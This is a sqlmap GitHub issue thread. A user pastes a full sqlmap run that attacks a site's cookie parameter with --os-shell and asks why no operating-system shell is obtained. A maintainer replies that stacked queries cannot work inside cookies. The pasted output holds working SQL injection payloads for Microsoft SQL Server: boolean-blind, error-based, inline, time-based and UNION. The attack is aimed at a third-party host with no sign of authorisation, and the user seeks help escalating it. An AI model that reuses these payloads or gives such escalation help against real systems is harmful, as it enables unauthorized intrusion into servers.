### ISSUE TITLE
error --os-shell

### ISSUE THREAD

**Issue by mazamaza2** [sqlmapproject/sqlmap#2024]
C:\>sqli\10\sqlmap.py -u "http://www.site.net/index.cfm" --cookie="ORDER_ID=
1*; MAXLINES=100" --thread=10 --batch --random-agent --level=3 --risk=3 --union-
char=1 --os-shell
         _
 ___ ___| |_____ ___ ___  {1.0.7.15#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at 22:50:00

[22:50:00] [INFO] fetched random HTTP User-Agent header from file 'C:\sqli\10\tx
t\user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit
/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14'
custom injection marking character ('*') found in option '--headers/--user-agent
/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[22:50:00] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:50:00] [INFO] testing connection to the target URL
[22:50:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://www.site.net:80/index2.cfm'. Do you wan
t to follow? [Y/n] Y
[22:50:05] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: ORDER_ID=(SELECT (CASE WHEN (5261=5261) THEN 5261 ELSE 5261*(SELECT
 5261 UNION ALL SELECT 8901) END));

    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: ORDER_ID=-9756 OR 1129=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR
(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1129=1129) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(107)+CHAR(113)));

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: ORDER_ID=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+
(SELECT (CASE WHEN (3588=3588) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(
118)+CHAR(98)+CHAR(107)+CHAR(113));

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: ORDER_ID=1 AND 2224=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers
 AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys
users AS sys7);

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: ORDER_ID=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(83)+CHAR(73)+CHAR(8
3)+CHAR(67)+CHAR(111)+CHAR(68)+CHAR(119)+CHAR(89)+CHAR(112)+CHAR(66)+CHAR(110)+C
HAR(84)+CHAR(106)+CHAR(106)+CHAR(69)+CHAR(120)+CHAR(86)+CHAR(119)+CHAR(100)+CHAR
(81)+CHAR(112)+CHAR(67)+CHAR(78)+CHAR(74)+CHAR(67)+CHAR(104)+CHAR(81)+CHAR(110)+
CHAR(112)+CHAR(66)+CHAR(65)+CHAR(103)+CHAR(115)+CHAR(78)+CHAR(119)+CHAR(117)+CHA
R(108)+CHAR(120)+CHAR(65)+CHAR(98)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(107)+CHAR(1
13),NULL,NULL,NULL,NULL-- qykS;
---
[22:50:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[22:50:05] [CRITICAL] unable to prompt for an interactive operating system shell
 via the back-end DBMS because stacked queries SQL injection is not supported

[*] shutting down at 22:50:05

C:\>

**>>> [22:50:05] [CRITICAL] unable to prompt for an interactive operating system shell
 via the back-end DBMS because stacked queries SQL injection is not supported <<<**

Help me please! I do not know that you can still make a = ((((

**Comment by stamparm** [comment]
You can't have stacked queries inside the cookie because the character ; has a special meaning (splitting cookie values)
